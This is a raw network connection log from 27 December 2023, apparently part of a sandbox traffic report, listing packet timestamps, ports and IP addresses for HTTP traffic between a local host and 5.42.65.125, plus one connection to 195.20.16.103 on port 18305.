Dec 27, 2023 18:12:23.951613903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.951627016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.951670885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.954267025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.954279900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.954322100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.956238031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.956250906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.956295013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.960242987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.960254908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.960282087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.960659027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.960671902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.960711002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.963294029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.963305950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.963362932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.965318918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.965333939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.965375900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.967520952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.967539072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.967595100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.970170975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.970184088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.970233917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.972275972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.972307920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.972332954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.974145889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.974183083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.974205971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.977019072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.977031946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.977083921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.979032040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.979044914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.979094028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.982634068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.982646942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.982687950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.983112097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.983124971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.983150959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.984565020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.984606028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.984647989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.986434937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.986450911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.986474037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.988504887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.988518000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.988559961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.991122961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.991134882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.991190910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.992995024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.993007898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.993051052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.993438005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.993475914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.995013952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.998182058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.998223066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.998239994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.999111891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.999150991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.999157906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.002088070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.002105951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.002155066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.002690077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.002728939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.003221989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.005240917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.005254984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.005297899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.008057117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.008069992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.008112907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.008440018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.008477926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.008481026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.010718107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.010797024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.010833025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.012787104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.012810946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.012833118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.014707088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.014754057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.014799118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.016246080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.016293049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.016343117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.018436909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.018491983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.018533945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.019882917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.019896030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.019929886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.022063971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.022109985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.022136927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.024003029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.024014950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.024055004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.026587963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.026613951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.026634932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.027117014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.027128935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.027178049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.031214952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.031227112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.031281948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.031548977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.031589031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.031601906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.032409906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.032422066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.032450914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.033278942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.033293009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.033339977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.034055948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.034068108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.034096003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.034986973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.035006046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.035044909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.035696030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.035708904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.035734892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.036632061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.036672115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.036984921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.036998987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.037029028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.037877083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.037990093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.038681030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.038693905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.038722992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.038746119 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.039577007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.039589882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.039628029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.040616989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.040671110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.041193962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.041207075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.041239023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.041260958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.042001009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.042013884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.042047024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.042923927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.042953968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.042983055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.043720007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.043732882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.043775082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.044579983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.044622898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.045420885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.045434952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.045460939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.045490980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.046269894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.046288013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.046322107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.047085047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.047131062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.047168016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.047919035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.048012972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.048768997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.048808098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.048813105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.048851013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.049685001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.049698114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.049752951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.050443888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.050458908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.050498962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.051325083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.051338911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.051383018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.052153111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.052167892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.052205086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.052954912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.053000927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.053874016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.053886890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.053921938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.053947926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.054650068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.054661989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.054698944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.055494070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.055510044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.055557966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.056401014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.056420088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.056461096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.057281017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.057293892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.057333946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.058027983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.058041096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.058077097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.058938980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.058953047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.058988094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.059789896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.059803963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.059849977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.060559034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.060571909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.060606003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.061423063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.061460972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.062324047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.062335968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.062381029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.063086033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.063119888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.063172102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.063895941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.063909054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.063941956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.064750910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.064764977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.064830065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.065696001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.065710068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.065747023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.066467047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.066479921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.066519022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.067308903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.067321062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.067370892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.068176031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.068188906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.068239927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.069020987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.069034100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.069072008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.069989920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.070003986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.070035934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.070696115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.070749998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.070792913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.072510004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.072526932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.072537899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.072549105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.072575092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.072593927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.073132992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.073199034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.073242903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.077730894 CET	49739	18305	192.168.2.4	195.20.16.103
Dec 27, 2023 18:12:24.080763102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.080785990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.080799103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.080810070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.080821037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.080832005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.080843925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.080856085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.080859900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.080869913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.080883026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.080888033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.080893993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.080904961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.080905914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.080915928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.080924034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.080929041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.080940008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.080950022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.080959082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.080961943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.080974102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.080987930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.081008911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.081566095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.081578970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.081614017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.082561970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.082578897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.082637072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.083339930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.083353996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.083396912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.084139109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.084152937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.084213972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.084971905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.084986925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.085026979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.085895061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.085907936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.085956097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.086689949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.086703062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.086747885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.087486982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.087538004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.087584019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.088319063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.088407993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.089174986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.089188099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.089226961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.089261055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.090034008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.090070009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.090120077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.090818882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.090841055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.090886116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.091669083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.091681004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.091726065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.092540026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.092576981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.092626095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.093369961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.093383074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.093436003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.094249964 CET	80	49738	5.42.65.125	192.168.2.4
